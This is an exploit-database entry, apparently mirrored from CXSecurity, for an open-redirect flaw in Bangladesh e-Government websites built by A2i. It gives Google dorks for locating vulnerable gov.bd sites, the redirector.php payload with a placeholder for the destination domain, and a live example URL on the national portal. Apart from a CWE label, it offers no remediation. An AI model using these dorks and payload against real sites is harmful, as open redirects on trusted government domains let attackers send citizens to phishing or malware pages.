Technical Support A2i-PMO Bangladesh e-Government Open Redirection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1209560 漏洞类型
发布时间 2018-06-10 更新时间 2018-06-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060089
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : Technical Support A2i-PMO Bangladesh e-Government Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 09/06/2018
# Vendor Homepage : a2i.pmo.gov.bd ~ a2i.gov.bd
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]

#################################################################################################

# Google Dork 1 : intext:''কারিগরি সহায়তায় a2i"

# Google Dork 2 : inurl:''/redirector.php?url='' site:gov.bd

# Exploit : /redirector.php?url=[www.DOMAINADDRESSHERE]/&id=8e12b3a9-1145-43c5-8bbe-a415d0e58d98

#################################################################################################

# Example Site =>  Bangladesh e-Government Official Site is Vulnerable for URL Redirection to Untrusted Site ('Open Redirect')

bangladesh.gov.bd/redirector.php?url=[www.DOMAINADDRESSHERE]/&id=8e12b3a9-1145-43c5-8bbe-a415d0e58d98 

# Proof of Concept => archive.is/Jm7O6

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################